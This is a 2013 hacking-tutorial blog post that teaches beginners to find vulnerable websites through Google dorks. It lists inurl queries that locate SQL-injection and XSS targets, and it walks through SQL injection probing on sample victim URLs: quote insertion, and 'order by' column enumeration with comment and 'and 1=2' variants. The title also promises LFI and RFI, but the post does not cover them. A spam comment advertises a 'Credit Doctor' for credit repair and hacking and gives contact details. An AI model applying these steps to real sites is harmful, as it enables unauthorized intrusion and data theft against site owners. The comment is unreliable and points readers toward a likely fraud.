Introductory Video

Monday, 15 July 2013

Filled Under: , , , ,

How To Find A Vulnerable Website For XSS, SQLI, LFI, RFI Using Google Dorks ?

Find A Vulnerable Website Using Google Dorks


Hi Guys.In My previous Post i give you some Google Dorks list.Now Today I tell You How To Find A Vulnerable Website Using Google Dorks.Most of the people search in Google or other search engine to check the vulnerable website and in the end some are successful and some are not. This is also problem for new Hackers who don’t know how to check the vulnerable website.Google is best friend for Hackers.Now We can find the Vulnerable website using Google search. This is known as Google Dorks.
There are lot of dorks to check the website is it vulnerable or not.There are lot of dorks to check the website is it vulnerable or not.
Now Lets Start :


Check website for SQL injection SQLI:

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=d=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=


For More Click Here

copy one from above list and paste in Google search box,And hit enter like shown below
Eg:

http://www.Google.com/index.php?id=2

Now hit enter:
 

if the page remains in the same page,then it is not vulnerable website.
If the page show any error or show blank page, then it is vulnerable website.


Now let's check further: Remove single quote from url
Then add this "order by x" (without quotes)
replace the x with 0,1,2,....n.(until it show error page).

For Eg:
http://www.victim.com/index.php?id=2 order by 1 (no error)
http://www.victim.com/index.php?id=2 order by 2 (no error)
http://www.victim.com/index.php?id=2 order by 3 (no error)
http://www.victim.com/index.php?id=2 order by 4 (no error)
http://www.victim.com/index.php?id=2 order by 5(error)

Now you can come to one conclusion is that website has 4 columns.
Also it is vulnerable
.

If the above method is not working,then try this:
 

http://www.victim.com/index.php?id=2 order by 1-- (no error)
http://www.victim.com/index.php?id=2 order by 2-- (no error)
http://www.victim.com/index.php?id=2 order by 3-- (no error)
http://www.victim.com/index.php?id=2 order by 4-- (no error)
http://www.victim.com/index.php?id=2 order by 5--(error)

If this is also not working,then try this:

http://www.victim.com/index.php?id=2 and 1=2 order by 1-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 2-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 3-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 4-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 5--(error)

Check website for Cross site scripting XSS:

inurl:".php?search="

inurl:".php?searchstring="


inurl:search.php?q=


inurl:com_feedpostold/feedpost.php?url=


inurl:/poll/default.asp?catid=

 

inurl:/search_results.php?search=
 
inurl:scrapbook.php?id=
 

inurl:headersearch.php?sid=

How to check Sub domain :

If you want to find vulnerabilities of website . so you should go for sub domain. The best dork for searching subdomain is below 
Site: URL –inurl:www
Like if I want to find the subdomain of Google . so it’s like below and don’t add Http and www with the domain 
Site: google.com –inurl:www
 
 
 Enjoy :)
 

1 comments:

  1. My ex ruined my credit due to his incessant extravagant spending spree, I found myself in a big mess. I talked to a credit repair company and I was told that it would take me non less than a year to fix my credit. I was devastated, that's a very long time which I can't cope with. I looked online and came across Credit Doctor's contact, hit him up and to my greatest surprise, my credit was repaired in 4 working days from 486 -810. I was so amazed and it didn't cost me too much really. I implore you to contact him on for all credit issues and hacking issues. No doubt that he's the best out there and your problems will be solved!
    HACKINTECHNOLOGY@GMAIL.COM
    +16692252253

    ReplyDelete